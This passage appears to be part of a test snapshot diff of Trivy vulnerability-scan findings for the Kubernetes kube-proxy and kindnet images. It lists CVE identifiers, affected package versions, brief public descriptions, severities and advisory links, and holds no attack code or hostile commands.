"zlib1g", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "http://www.openwall.com/lists/oss-security/2022/03/25/2", + "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "https://access.redhat.com/errata/RHSA-2022:8420", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "https://access.redhat.com/security/cve/CVE-2018-25032", + "https://bugzilla.redhat.com/2067945", + "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "https://github.com/madler/zlib/issues/605", + "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "https://linux.oracle.com/cve/CVE-2018-25032.html", + "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "https://security.gentoo.org/glsa/202210-42", + "https://security.netapp.com/advisory/ntap-20220526-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5355-1", + "https://ubuntu.com/security/notices/USN-5355-2", + "https://ubuntu.com/security/notices/USN-5359-1", + "https://ubuntu.com/security/notices/USN-5359-2", + "https://ubuntu.com/security/notices/USN-5739-1", + "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "https://www.debian.org/security/2022/dsa-5111", + "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/nvd/cve-2018-25032", + }, + { + "type": "URL", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://access.redhat.com/errata/RHSA-2022:8420", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://bugzilla.redhat.com/2067945", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://github.com/madler/zlib/issues/605", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://security.gentoo.org/glsa/202210-42", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://support.apple.com/kb/HT213255", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5355-1", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://ubuntu.com/security/notices/USN-5355-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5359-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5359-2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://ubuntu.com/security/notices/USN-5739-1", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://www.debian.org/security/2022/dsa-5111", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "2.16.0+incompatible", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-1996", + "installedVersion": "v2.9.5+incompatible", + "packageName": "github.com/emicklei/go-restful", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "https://access.redhat.com/security/cve/CVE-2022-1996", + "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", + "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "https://github.com/emicklei/go-restful/issues/489", + "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "https://pkg.go.dev/vuln/GO-2022-0619", + "https://security.netapp.com/advisory/ntap-20220923-0005/", + "https://www.cve.org/CVERecord?id=CVE-2022-1996", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "Authorization Bypass Through User-Controlled Key", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://avd.aquasec.com/nvd/cve-2022-1996", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2022-1996", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://github.com/emicklei/go-restful/issues/489", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0619", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + 